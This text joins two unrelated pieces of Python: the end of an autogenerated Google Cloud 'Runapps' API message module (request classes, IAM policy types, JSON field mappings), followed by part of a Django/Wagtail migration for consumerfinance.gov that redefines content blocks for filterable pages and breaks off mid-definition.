  pageSize = _messages.IntegerField(3, variant=_messages.Variant.INT32)
  pageToken = _messages.StringField(4)
  parent = _messages.StringField(5, required=True)
class RunappsProjectsLocationsApplicationsGetIamPolicyRequest(_messages.Message):
  r"""A RunappsProjectsLocationsApplicationsGetIamPolicyRequest object.

  Fields:
    options_requestedPolicyVersion: Optional. The maximum policy version
      that will be used to format the policy. Valid values are 0, 1, and 3.
      Requests specifying an invalid value will be rejected. Requests for
      policies with any conditional role bindings must specify version 3.
      Policies with no conditional role bindings may specify any valid value
      or leave the field unset. The policy in the response might use the
      policy version that you specified, or it might use a lower policy
      version. For example, if you specify version 3, but the policy has no
      conditional role bindings, the response uses version 1. To learn which
      resources support conditions in their IAM policies, see the [IAM docum
      entation](https://cloud.google.com/iam/help/conditions/resource-
      policies).
    resource: REQUIRED: The resource for which the policy is being
      requested. See the operation documentation for the appropriate value
      for this field.
  """

  options_requestedPolicyVersion = _messages.IntegerField(1, variant=_messages.Variant.INT32)
  resource = _messages.StringField(2, required=True)
class RunappsProjectsLocationsApplicationsGetRequest(_messages.Message):
  r"""A RunappsProjectsLocationsApplicationsGetRequest object.

  Fields:
    name: Required. Name of the resource.
  """

  name = _messages.StringField(1, required=True)
class RunappsProjectsLocationsApplicationsGetStatusRequest(_messages.Message):
  r"""A RunappsProjectsLocationsApplicationsGetStatusRequest object.

  Fields:
    name: Required. Name of the resource.
  """

  name = _messages.StringField(1, required=True)
class RunappsProjectsLocationsApplicationsListRequest(_messages.Message):
  r"""A RunappsProjectsLocationsApplicationsListRequest object.

  Fields:
    filter: Filtering results.
    orderBy: Hint for how to order the results.
    pageSize: Requested page size. Server may return fewer items than
      requested. If unspecified, server will pick an appropriate default.
    pageToken: A token identifying a page of results the server should
      return.
    parent: Required. Parent value for ListApplicationsRequest.
  """

  filter = _messages.StringField(1)
  orderBy = _messages.StringField(2)
  pageSize = _messages.IntegerField(3, variant=_messages.Variant.INT32)
  pageToken = _messages.StringField(4)
  parent = _messages.StringField(5, required=True)
class RunappsProjectsLocationsApplicationsPatchRequest(_messages.Message):
  r"""A RunappsProjectsLocationsApplicationsPatchRequest object.

  Fields:
    application: An Application resource to be passed as the request body.
    name: Name of the resource.
    requestId: An optional request ID to identify requests. Specify a unique
      request ID so that if you must retry your request, the server will
      know to ignore the request if it has already been completed. The
      server will guarantee that for at least 60 minutes since the first
      request. For example, consider a situation where you make an initial
      request and the request times out. If you make the request again with
      the same request ID, the server can check if the original operation
      with the same request ID was received, and if so, will ignore the
      second request. This prevents clients from accidentally creating
      duplicate commitments. The request ID must be a valid UUID with the
      exception that the zero UUID is not supported
      (00000000-0000-0000-0000-000000000000).
    updateMask: Required. Field mask is used to specify the fields to be
      overwritten in the Application resource by the update. The fields
      specified in the update_mask are relative to the resource, not the
      full request. A field will be overwritten if it is in the mask. If the
      user does not provide a mask then all fields will be overwritten.
  """

  application = _messages.MessageField('Application', 1)
  name = _messages.StringField(2, required=True)
  requestId = _messages.StringField(3)
  updateMask = _messages.StringField(4)
class RunappsProjectsLocationsApplicationsSetIamPolicyRequest(_messages.Message):
  r"""A RunappsProjectsLocationsApplicationsSetIamPolicyRequest object.

  Fields:
    resource: REQUIRED: The resource for which the policy is being
      specified. See the operation documentation for the appropriate value
      for this field.
    setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the
      request body.
  """

  resource = _messages.StringField(1, required=True)
  setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2)
class RunappsProjectsLocationsApplicationsTestIamPermissionsRequest(_messages.Message):
  r"""A RunappsProjectsLocationsApplicationsTestIamPermissionsRequest object.

  Fields:
    resource: REQUIRED: The resource for which the policy detail is being
      requested. See the operation documentation for the appropriate value
      for this field.
    testIamPermissionsRequest: A TestIamPermissionsRequest resource to be
      passed as the request body.
  """

  resource = _messages.StringField(1, required=True)
  testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2)
class RunappsProjectsLocationsGetRequest(_messages.Message):
  r"""A RunappsProjectsLocationsGetRequest object.

  Fields:
    name: Resource name for the location.
  """

  name = _messages.StringField(1, required=True)
class RunappsProjectsLocationsListRequest(_messages.Message):
  r"""A RunappsProjectsLocationsListRequest object.

  Fields:
    filter: A filter to narrow down results to a preferred subset. The
      filtering language accepts strings like "displayName=tokyo", and is
      documented in more detail in [AIP-160](https://google.aip.dev/160).
    name: The resource that owns the locations collection, if applicable.
    pageSize: The maximum number of results to return. If not set, the
      service selects a default.
    pageToken: A page token received from the `next_page_token` field in the
      response. Send that page token to receive the subsequent page.
  """

  filter = _messages.StringField(1)
  name = _messages.StringField(2, required=True)
  pageSize = _messages.IntegerField(3, variant=_messages.Variant.INT32)
  pageToken = _messages.StringField(4)
class RunappsProjectsLocationsOperationsCancelRequest(_messages.Message):
  r"""A RunappsProjectsLocationsOperationsCancelRequest object.

  Fields:
    cancelOperationRequest: A CancelOperationRequest resource to be passed
      as the request body.
    name: The name of the operation resource to be cancelled.
  """

  cancelOperationRequest = _messages.MessageField('CancelOperationRequest', 1)
  name = _messages.StringField(2, required=True)
class RunappsProjectsLocationsOperationsDeleteRequest(_messages.Message):
  r"""A RunappsProjectsLocationsOperationsDeleteRequest object.

  Fields:
    name: The name of the operation resource to be deleted.
  """

  name = _messages.StringField(1, required=True)
class RunappsProjectsLocationsOperationsGetRequest(_messages.Message):
  r"""A RunappsProjectsLocationsOperationsGetRequest object.

  Fields:
    name: The name of the operation resource.
  """

  name = _messages.StringField(1, required=True)
class RunappsProjectsLocationsOperationsListRequest(_messages.Message):
  r"""A RunappsProjectsLocationsOperationsListRequest object.

  Fields:
    filter: The standard list filter.
    name: The name of the operation's parent resource.
    pageSize: The standard list page size.
    pageToken: The standard list page token.
  """

  filter = _messages.StringField(1)
  name = _messages.StringField(2, required=True)
  pageSize = _messages.IntegerField(3, variant=_messages.Variant.INT32)
  pageToken = _messages.StringField(4)
class Selector(_messages.Message):
  r"""Message for selecting the resources within an application. Next tag: 3

  Fields:
    matchTypeNames: match_type_names is a list of resource name + type pairs
      to match. Use '*' or the empty string as a wildcard for either the
      name or the type. E.g. type='service' name='' will match all services;
      type='*' name='default' will match all resources named 'default'.
    notTypeNames: not_type_names excludes the given names + types. If a
      type+name is in this list as well as in match_type_names, it will not
      be selected.
  """

  matchTypeNames = _messages.MessageField('TypedName', 1, repeated=True)
  notTypeNames = _messages.MessageField('TypedName', 2, repeated=True)
class ServiceResourceBindingConfig(_messages.Message):
  r"""Message for a binding between a Cloud Run service and a resource.
  Messages:
    BindingConfigValue: Any configs associated with the binding. e.g. "db-
      name-env-name": "SQL_NAME".
  Fields:
    binding_config: Any configs associated with the binding. e.g. "db-name-
      env-name": "SQL_NAME".
    ref: Ref to another resource. Format: "/", e.g. "cloudsql/sql_db".
  """

  # JSON keys with no declared field are folded into `additionalProperties`,
  # so arbitrary string-valued config keys round-trip through this message.
  @encoding.MapUnrecognizedFields('additionalProperties')
  class BindingConfigValue(_messages.Message):
    r"""Any configs associated with the binding. e.g. "db-name-env-name":
    "SQL_NAME".
    Messages:
      AdditionalProperty: An additional property for a BindingConfigValue
        object.
    Fields:
      additionalProperties: Additional properties of type BindingConfigValue
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a BindingConfigValue object.
      Fields:
        key: Name of the additional property.
        value: A string attribute.
      """

      # One key/value pair of the JSON map.
      key = _messages.StringField(1)
      value = _messages.StringField(2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  # Serialized to JSON as 'binding-config' via the custom field mapping
  # registered at module level.
  binding_config = _messages.MessageField('BindingConfigValue', 1)
  ref = _messages.StringField(2)
class SetIamPolicyRequest(_messages.Message):
  r"""Request body for the `SetIamPolicy` method.

  Fields:
    policy: REQUIRED: The complete policy to be applied to the `resource`.
      The policy is limited in size to a few tens of kilobytes. An empty
      policy is valid, though certain Cloud Platform services (such as
      Projects) might reject it.
  """

  policy = _messages.MessageField('Policy', 1)
class StandardQueryParameters(_messages.Message):
  r"""Query parameters accepted by all methods.
  Enums:
    FXgafvValueValuesEnum: V1 error format.
    AltValueValuesEnum: Data format for response.
  Fields:
    f__xgafv: V1 error format.
    access_token: OAuth access token.
    alt: Data format for response.
    callback: JSONP
    fields: Selector specifying which fields to include in a partial response.
    key: API key. Your API key identifies your project and provides you with
      API access, quota, and reports. Required unless you provide an OAuth 2.0
      token.
    oauth_token: OAuth 2.0 token for the current user.
    prettyPrint: Returns response with indentations and line breaks.
    quotaUser: Available to use for quota purposes for server-side
      applications. Can be any arbitrary string assigned to a user, but should
      not exceed 40 characters.
    trace: A tracing token of the form "token:<tokenid>" to include in api
      requests.
    uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
    upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
  """

  class AltValueValuesEnum(_messages.Enum):
    r"""Data format for response.
    Values:
      json: Responses with Content-Type of application/json
      media: Media download with context-dependent Content-Type
      proto: Responses with Content-Type of application/x-protobuf
    """
    json = 0
    media = 1
    proto = 2

  class FXgafvValueValuesEnum(_messages.Enum):
    r"""V1 error format.
    Values:
      _1: v1 error format
      _2: v2 error format
    """
    # Wire values are '1' and '2' via the custom enum mappings registered at
    # module level ('_' prefixes keep the Python names valid identifiers).
    _1 = 0
    _2 = 1

  # Serialized to JSON as '$.xgafv' via the custom field mapping registered
  # at module level (the '__' encodes the '.' in the wire name).
  f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
  access_token = _messages.StringField(2)
  alt = _messages.EnumField('AltValueValuesEnum', 3, default='json')
  callback = _messages.StringField(4)
  fields = _messages.StringField(5)
  key = _messages.StringField(6)
  oauth_token = _messages.StringField(7)
  prettyPrint = _messages.BooleanField(8, default=True)
  quotaUser = _messages.StringField(9)
  trace = _messages.StringField(10)
  uploadType = _messages.StringField(11)
  upload_protocol = _messages.StringField(12)
class Status(_messages.Message):
  r"""The `Status` type defines a logical error model that is suitable for
  different programming environments, including REST APIs and RPC APIs. It is
  used by [gRPC](https://github.com/grpc). Each `Status` message contains
  three pieces of data: error code, error message, and error details. You can
  find out more about this error model and how to work with it in the [API
  Design Guide](https://cloud.google.com/apis/design/errors).
  Messages:
    DetailsValueListEntry: A DetailsValueListEntry object.
  Fields:
    code: The status code, which should be an enum value of google.rpc.Code.
    details: A list of messages that carry the error details. There is a
      common set of message types for APIs to use.
    message: A developer-facing error message, which should be in English. Any
      user-facing error message should be localized and sent in the
      google.rpc.Status.details field, or localized by the client.
  """

  # Unknown JSON keys are preserved in `additionalProperties`, so detail
  # payloads of arbitrary shape round-trip through this entry type.
  @encoding.MapUnrecognizedFields('additionalProperties')
  class DetailsValueListEntry(_messages.Message):
    r"""A DetailsValueListEntry object.
    Messages:
      AdditionalProperty: An additional property for a DetailsValueListEntry
        object.
    Fields:
      additionalProperties: Properties of the object. Contains field @type
        with type URL.
    """

    class AdditionalProperty(_messages.Message):
      r"""An additional property for a DetailsValueListEntry object.
      Fields:
        key: Name of the additional property.
        value: A extra_types.JsonValue attribute.
      """

      # One key/value pair; values are arbitrary JSON via extra_types.
      key = _messages.StringField(1)
      value = _messages.MessageField('extra_types.JsonValue', 2)

    additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)

  # Numeric google.rpc.Code value (see the class docstring).
  code = _messages.IntegerField(1, variant=_messages.Variant.INT32)
  details = _messages.MessageField('DetailsValueListEntry', 2, repeated=True)
  message = _messages.StringField(3)
class Target(_messages.Message):
  r"""A persisted data store that Render writes its output to.

  Fields:
    cloudStorage: A Cloud Storage target location.
  """

  cloudStorage = _messages.MessageField('CloudStorage', 1)
class TestIamPermissionsRequest(_messages.Message):
  r"""Request body for the `TestIamPermissions` method.

  Fields:
    permissions: The set of permissions to check for the `resource`.
      Wildcard permissions (such as '*' or 'storage.*') are not allowed. For
      more information see [IAM
      Overview](https://cloud.google.com/iam/docs/overview#permissions).
  """

  permissions = _messages.StringField(1, repeated=True)
class TestIamPermissionsResponse(_messages.Message):
  r"""Response body for the `TestIamPermissions` method.

  Fields:
    permissions: The subset of `TestPermissionsRequest.permissions` that the
      caller is allowed.
  """

  permissions = _messages.StringField(1, repeated=True)
class TypedName(_messages.Message):
  r"""A resource name paired with its resource type. Next tag: 3

  Fields:
    name: The name of the resource.
    type: The type of the resource.
  """

  # NOTE: the field name `type` mirrors the API surface and intentionally
  # shadows the builtin within this class body.
  type = _messages.StringField(2)
  name = _messages.StringField(1)
class VPCConfig(_messages.Message):
  r"""VPC-related configuration.

  Fields:
    network: Name of an existing network. When omitted, a new network is
      created for the application.
  """

  network = _messages.StringField(1)
# Register custom JSON names for fields whose Python identifiers differ from
# their wire names: snake_case attributes map to kebab-case JSON keys, and
# the dunder-escaped `f__xgafv` maps to the '$.xgafv' query parameter (its
# enum members '_1'/'_2' map to the wire values '1'/'2').
encoding.AddCustomJsonFieldMapping(
    CloudSqlSettings, 'activation_policy', 'activation-policy')
encoding.AddCustomJsonFieldMapping(
    CloudSqlSettings, 'availability_type', 'availability-type')
encoding.AddCustomJsonFieldMapping(
    CloudSqlSettings, 'disk_size', 'disk-size')
encoding.AddCustomJsonFieldMapping(
    CloudSqlSettings, 'disk_type', 'disk-type')
encoding.AddCustomJsonFieldMapping(
    RedisInstanceConfig, 'memory_size_gb', 'memory-size-gb')
encoding.AddCustomJsonFieldMapping(
    RedisInstanceConfig, 'redis_parameters', 'redis-parameters')
encoding.AddCustomJsonFieldMapping(
    RouterConfig, 'default_route', 'default-route')
encoding.AddCustomJsonFieldMapping(
    RouterConfig, 'dns_zone', 'dns-zone')
encoding.AddCustomJsonFieldMapping(
    ServiceResourceBindingConfig, 'binding_config', 'binding-config')
encoding.AddCustomJsonFieldMapping(
    StandardQueryParameters, 'f__xgafv', '$.xgafv')
encoding.AddCustomJsonEnumMapping(
    StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1')
encoding.AddCustomJsonEnumMapping(
    StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
| 39.359316 | 93 | 0.740505 |
118d32c90ef5d04148a56b70f2b75c7b002feb9d | 23,762 | py | Python | cfgov/v1/migrations/0264_add_filters_help_text.py | adebisi-aden/consumerfinance.gov | 8c0f5afac341823c59f73b0c6bd60592e0f5eaca | [
"CC0-1.0"
] | 37 | 2020-08-18T19:52:39.000Z | 2022-03-23T08:08:41.000Z | cfgov/v1/migrations/0264_add_filters_help_text.py | adebisi-aden/consumerfinance.gov | 8c0f5afac341823c59f73b0c6bd60592e0f5eaca | [
"CC0-1.0"
] | 338 | 2020-08-14T20:46:36.000Z | 2022-03-31T20:49:32.000Z | cfgov/v1/migrations/0264_add_filters_help_text.py | adebisi-aden/consumerfinance.gov | 8c0f5afac341823c59f73b0c6bd60592e0f5eaca | [
"CC0-1.0"
] | 14 | 2020-10-21T15:27:03.000Z | 2022-03-17T03:16:36.000Z | # Generated by Django 2.2.23 on 2021-07-06 21:53
from django.db import migrations
import v1.atomic_elements.organisms
import v1.blocks
import v1.util.ref
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('v1', '0263_add_default_empty_list_for_213_prep'),
]
operations = [
migrations.AlterField(
model_name='browsefilterablepage',
name='content',
field=wagtail.core.fields.StreamField([('full_width_text', wagtail.core.blocks.StreamBlock([('content', wagtail.core.blocks.RichTextBlock(icon='edit')), ('content_with_anchor', wagtail.core.blocks.StructBlock([('content_block', wagtail.core.blocks.RichTextBlock()), ('anchor_link', wagtail.core.blocks.StructBlock([('link_id', wagtail.core.blocks.CharBlock(help_text='\n ID will be auto-generated on save.\n However, you may enter some human-friendly text that\n will be incorporated to make it easier to read.\n ', label='ID for this content block', required=False))]))])), ('heading', wagtail.core.blocks.StructBlock([('text', v1.blocks.HeadingTextBlock(required=False)), ('level', wagtail.core.blocks.ChoiceBlock(choices=[('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4')])), ('icon', v1.blocks.HeadingIconBlock(help_text='Input the name of an icon to appear to the left of the heading. E.g., approved, help-round, etc. <a href="https://cfpb.github.io/design-system/foundation/iconography">See full list of icons</a>', required=False))], required=False)), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.core.blocks.StructBlock([('upload', wagtail.images.blocks.ImageChooserBlock(required=False)), ('alt', wagtail.core.blocks.CharBlock(help_text="If the image is decorative (i.e., if a screenreader wouldn't have anything useful to say about it), leave the Alt field blank.", required=False))])), ('image_width', wagtail.core.blocks.ChoiceBlock(choices=[('full', 'Full width'), (470, '470px'), (270, '270px'), (170, '170px'), ('bleed', 'Bleed into left/right margins')])), ('image_position', wagtail.core.blocks.ChoiceBlock(choices=[('right', 'right'), ('left', 'left')], help_text='Does not apply if the image is full-width')), ('text', wagtail.core.blocks.RichTextBlock(label='Caption', required=False)), ('is_bottom_rule', wagtail.core.blocks.BooleanBlock(default=True, help_text='Check to add a horizontal rule line to bottom of inset.', label='Has bottom rule line', required=False))])), 
('table_block', v1.atomic_elements.organisms.AtomicTableBlock(table_options={'renderer': 'html'})), ('quote', wagtail.core.blocks.StructBlock([('body', wagtail.core.blocks.TextBlock()), ('citation', wagtail.core.blocks.TextBlock(required=False)), ('is_large', wagtail.core.blocks.BooleanBlock(required=False))])), ('cta', wagtail.core.blocks.StructBlock([('slug_text', wagtail.core.blocks.CharBlock(required=False)), ('paragraph_text', wagtail.core.blocks.RichTextBlock(required=False)), ('button', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(required=False)), ('aria_label', wagtail.core.blocks.CharBlock(help_text='Add an ARIA label if the link text does not describe the destination of the link (e.g. has ambiguous text like "Learn more" that is not descriptive on its own).', required=False)), ('url', wagtail.core.blocks.CharBlock(default='/', required=False)), ('size', wagtail.core.blocks.ChoiceBlock(choices=[('regular', 'Regular'), ('large', 'Large Primary')]))]))])), ('related_links', wagtail.core.blocks.StructBlock([('heading', wagtail.core.blocks.CharBlock(required=False)), ('paragraph', wagtail.core.blocks.RichTextBlock(required=False)), ('links', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(required=False)), ('aria_label', wagtail.core.blocks.CharBlock(help_text='Add an ARIA label if the link text does not describe the destination of the link (e.g. has ambiguous text like "Learn more" that is not descriptive on its own).', required=False)), ('url', wagtail.core.blocks.CharBlock(default='/', required=False))])))])), ('reusable_text', v1.blocks.ReusableTextChooserBlock('v1.ReusableText')), ('email_signup', wagtail.core.blocks.StructBlock([('heading', wagtail.core.blocks.CharBlock(default='Stay informed', required=False)), ('default_heading', wagtail.core.blocks.BooleanBlock(default=True, help_text='If selected, heading will be styled as an H5 with green top rule. 
Deselect to style header as H3.', label='Default heading style', required=False)), ('text', wagtail.core.blocks.CharBlock(help_text='Write a sentence or two about what kinds of emails the user is signing up for, how frequently they will be sent, etc.', required=False)), ('gd_code', wagtail.core.blocks.CharBlock(help_text='Code for the topic (i.e., mailing list) you want people who submit this form to subscribe to. Format: USCFPB_###', label='GovDelivery code', required=False)), ('disclaimer_page', wagtail.core.blocks.PageChooserBlock(help_text='Choose the page that the "See Privacy Act statement" link should go to. If in doubt, use "Generic Email Sign-Up Privacy Act Statement".', label='Privacy Act statement', required=False))])), ('well', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.RichTextBlock(label='Well', required=False))])), ('well_with_ask_search', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.RichTextBlock(label='Well', required=False)), ('ask_search', wagtail.core.blocks.StructBlock([('show_label', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to show form label.', required=False)), ('placeholder', wagtail.core.blocks.TextBlock(help_text='Text to show for the input placeholder text.', required=False))]))]))])), ('filter_controls', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(required=False)), ('is_bordered', wagtail.core.blocks.BooleanBlock(required=False)), ('is_midtone', wagtail.core.blocks.BooleanBlock(required=False)), ('is_expanded', wagtail.core.blocks.BooleanBlock(required=False)), ('no_posts_message', wagtail.core.blocks.CharBlock(help_text='Message for the <a href="https://cfpb.github.io/design-system/components/notifications#default-base-notification">notification</a> that will be displayed instead of filter controls if there are no posts to filter.', required=False)), ('no_posts_explanation', wagtail.core.blocks.CharBlock(help_text='Additional explanation for 
the notification that will be displayed if there are no posts to filter.', required=False)), ('post_date_description', wagtail.core.blocks.CharBlock(help_text='Strongly encouraged to help users understand the action that the date of the post is linked to, i.e. published, issued, released.', label='Date stamp descriptor', required=False)), ('title', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to include a "Search by keyword" filter in the filter controls.', label='Filter by keyword', required=False)), ('categories', wagtail.core.blocks.StructBlock([('filter_category', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to include a "Category" filter in the filter controls.', label='Filter by Category', required=False)), ('show_preview_categories', wagtail.core.blocks.BooleanBlock(default=True, required=False)), ('page_type', wagtail.core.blocks.ChoiceBlock(choices=v1.util.ref.filterable_list_page_types, required=False))])), ('topic_filtering', wagtail.core.blocks.ChoiceBlock(choices=[('no_filter', "Don't filter topics"), ('sort_alphabetically', 'Filter topics, sort topic list alphabetically'), ('sort_by_frequency', 'Filter topics, sort topic list by number of results')], help_text='Whether to include a "Topics" filter in the filter controls')), ('order_by', wagtail.core.blocks.ChoiceBlock(choices=[('-date_published', 'Date Published'), ('_score', 'Relevance')], help_text='How to order results')), ('statuses', wagtail.core.blocks.BooleanBlock(default=False, help_text='Whether to include a "Status" filter in the filter controls. Only enable if using on an enforcement actions filterable list.', label='Filter by Enforcement Statuses', required=False)), ('products', wagtail.core.blocks.BooleanBlock(default=False, help_text='Whether to include a "Product" filter in the filter controls. 
Only enable if using on an enforcement actions filterable list.', label='Filter by Enforcement Products', required=False)), ('authors', wagtail.core.blocks.BooleanBlock(default=True, label='Filter Authors', required=False)), ('date_range', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to include a set of "Date range" filters in the filter controls.', label='Filter by Date Range', required=False)), ('output_5050', wagtail.core.blocks.BooleanBlock(default=False, label='Render preview items as 50-50s', required=False)), ('link_image_and_heading', wagtail.core.blocks.BooleanBlock(default=False, help_text='Add links to post preview images and headings in filterable list results', required=False)), ('filter_children', wagtail.core.blocks.BooleanBlock(default=True, help_text='If checked this list will only filter its child pages. If both children and siblings are checked, only child pages will be filtered.', required=False))])), ('feedback', wagtail.core.blocks.StructBlock([('was_it_helpful_text', wagtail.core.blocks.CharBlock(default='Was this page helpful to you?', help_text='Use this field only for feedback forms that use "Was this helpful?" 
radio buttons.', required=False)), ('intro_text', wagtail.core.blocks.CharBlock(help_text='Optional feedback intro', required=False)), ('question_text', wagtail.core.blocks.CharBlock(help_text='Optional expansion on intro', required=False)), ('radio_intro', wagtail.core.blocks.CharBlock(help_text='Leave blank unless you are building a feedback form with extra radio-button prompts, as in /owning-a-home/help-us-improve/.', required=False)), ('radio_text', wagtail.core.blocks.CharBlock(default='This information helps us understand your question better.', required=False)), ('radio_question_1', wagtail.core.blocks.CharBlock(default='How soon do you expect to buy a home?', required=False)), ('radio_question_2', wagtail.core.blocks.CharBlock(default='Do you currently own a home?', required=False)), ('button_text', wagtail.core.blocks.CharBlock(default='Submit')), ('contact_advisory', wagtail.core.blocks.RichTextBlock(help_text='Use only for feedback forms that ask for a contact email', required=False))]))]),
),
migrations.AlterField(
model_name='sublandingfilterablepage',
name='content',
field=wagtail.core.fields.StreamField([('text_introduction', wagtail.core.blocks.StructBlock([('eyebrow', wagtail.core.blocks.CharBlock(help_text='Optional: Adds an H5 eyebrow above H1 heading text. Only use in conjunction with heading.', label='Pre-heading', required=False)), ('heading', wagtail.core.blocks.CharBlock(required=False)), ('intro', wagtail.core.blocks.RichTextBlock(required=False)), ('body', wagtail.core.blocks.RichTextBlock(required=False)), ('links', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(required=False)), ('aria_label', wagtail.core.blocks.CharBlock(help_text='Add an ARIA label if the link text does not describe the destination of the link (e.g. has ambiguous text like "Learn more" that is not descriptive on its own).', required=False)), ('url', wagtail.core.blocks.CharBlock(default='/', required=False))]), required=False)), ('has_rule', wagtail.core.blocks.BooleanBlock(help_text='Check this to add a horizontal rule line to bottom of text introduction.', label='Has bottom rule', required=False))])), ('full_width_text', wagtail.core.blocks.StreamBlock([('content', wagtail.core.blocks.RichTextBlock(icon='edit')), ('content_with_anchor', wagtail.core.blocks.StructBlock([('content_block', wagtail.core.blocks.RichTextBlock()), ('anchor_link', wagtail.core.blocks.StructBlock([('link_id', wagtail.core.blocks.CharBlock(help_text='\n ID will be auto-generated on save.\n However, you may enter some human-friendly text that\n will be incorporated to make it easier to read.\n ', label='ID for this content block', required=False))]))])), ('heading', wagtail.core.blocks.StructBlock([('text', v1.blocks.HeadingTextBlock(required=False)), ('level', wagtail.core.blocks.ChoiceBlock(choices=[('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4')])), ('icon', v1.blocks.HeadingIconBlock(help_text='Input the name of an icon to appear to the left of the heading. E.g., approved, help-round, etc. 
<a href="https://cfpb.github.io/design-system/foundation/iconography">See full list of icons</a>', required=False))], required=False)), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.core.blocks.StructBlock([('upload', wagtail.images.blocks.ImageChooserBlock(required=False)), ('alt', wagtail.core.blocks.CharBlock(help_text="If the image is decorative (i.e., if a screenreader wouldn't have anything useful to say about it), leave the Alt field blank.", required=False))])), ('image_width', wagtail.core.blocks.ChoiceBlock(choices=[('full', 'Full width'), (470, '470px'), (270, '270px'), (170, '170px'), ('bleed', 'Bleed into left/right margins')])), ('image_position', wagtail.core.blocks.ChoiceBlock(choices=[('right', 'right'), ('left', 'left')], help_text='Does not apply if the image is full-width')), ('text', wagtail.core.blocks.RichTextBlock(label='Caption', required=False)), ('is_bottom_rule', wagtail.core.blocks.BooleanBlock(default=True, help_text='Check to add a horizontal rule line to bottom of inset.', label='Has bottom rule line', required=False))])), ('table_block', v1.atomic_elements.organisms.AtomicTableBlock(table_options={'renderer': 'html'})), ('quote', wagtail.core.blocks.StructBlock([('body', wagtail.core.blocks.TextBlock()), ('citation', wagtail.core.blocks.TextBlock(required=False)), ('is_large', wagtail.core.blocks.BooleanBlock(required=False))])), ('cta', wagtail.core.blocks.StructBlock([('slug_text', wagtail.core.blocks.CharBlock(required=False)), ('paragraph_text', wagtail.core.blocks.RichTextBlock(required=False)), ('button', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(required=False)), ('aria_label', wagtail.core.blocks.CharBlock(help_text='Add an ARIA label if the link text does not describe the destination of the link (e.g. 
has ambiguous text like "Learn more" that is not descriptive on its own).', required=False)), ('url', wagtail.core.blocks.CharBlock(default='/', required=False)), ('size', wagtail.core.blocks.ChoiceBlock(choices=[('regular', 'Regular'), ('large', 'Large Primary')]))]))])), ('related_links', wagtail.core.blocks.StructBlock([('heading', wagtail.core.blocks.CharBlock(required=False)), ('paragraph', wagtail.core.blocks.RichTextBlock(required=False)), ('links', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(required=False)), ('aria_label', wagtail.core.blocks.CharBlock(help_text='Add an ARIA label if the link text does not describe the destination of the link (e.g. has ambiguous text like "Learn more" that is not descriptive on its own).', required=False)), ('url', wagtail.core.blocks.CharBlock(default='/', required=False))])))])), ('reusable_text', v1.blocks.ReusableTextChooserBlock('v1.ReusableText')), ('email_signup', wagtail.core.blocks.StructBlock([('heading', wagtail.core.blocks.CharBlock(default='Stay informed', required=False)), ('default_heading', wagtail.core.blocks.BooleanBlock(default=True, help_text='If selected, heading will be styled as an H5 with green top rule. Deselect to style header as H3.', label='Default heading style', required=False)), ('text', wagtail.core.blocks.CharBlock(help_text='Write a sentence or two about what kinds of emails the user is signing up for, how frequently they will be sent, etc.', required=False)), ('gd_code', wagtail.core.blocks.CharBlock(help_text='Code for the topic (i.e., mailing list) you want people who submit this form to subscribe to. Format: USCFPB_###', label='GovDelivery code', required=False)), ('disclaimer_page', wagtail.core.blocks.PageChooserBlock(help_text='Choose the page that the "See Privacy Act statement" link should go to. 
If in doubt, use "Generic Email Sign-Up Privacy Act Statement".', label='Privacy Act statement', required=False))])), ('well', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.RichTextBlock(label='Well', required=False))])), ('well_with_ask_search', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.RichTextBlock(label='Well', required=False)), ('ask_search', wagtail.core.blocks.StructBlock([('show_label', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to show form label.', required=False)), ('placeholder', wagtail.core.blocks.TextBlock(help_text='Text to show for the input placeholder text.', required=False))]))]))])), ('filter_controls', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(required=False)), ('is_bordered', wagtail.core.blocks.BooleanBlock(required=False)), ('is_midtone', wagtail.core.blocks.BooleanBlock(required=False)), ('is_expanded', wagtail.core.blocks.BooleanBlock(required=False)), ('no_posts_message', wagtail.core.blocks.CharBlock(help_text='Message for the <a href="https://cfpb.github.io/design-system/components/notifications#default-base-notification">notification</a> that will be displayed instead of filter controls if there are no posts to filter.', required=False)), ('no_posts_explanation', wagtail.core.blocks.CharBlock(help_text='Additional explanation for the notification that will be displayed if there are no posts to filter.', required=False)), ('post_date_description', wagtail.core.blocks.CharBlock(help_text='Strongly encouraged to help users understand the action that the date of the post is linked to, i.e. 
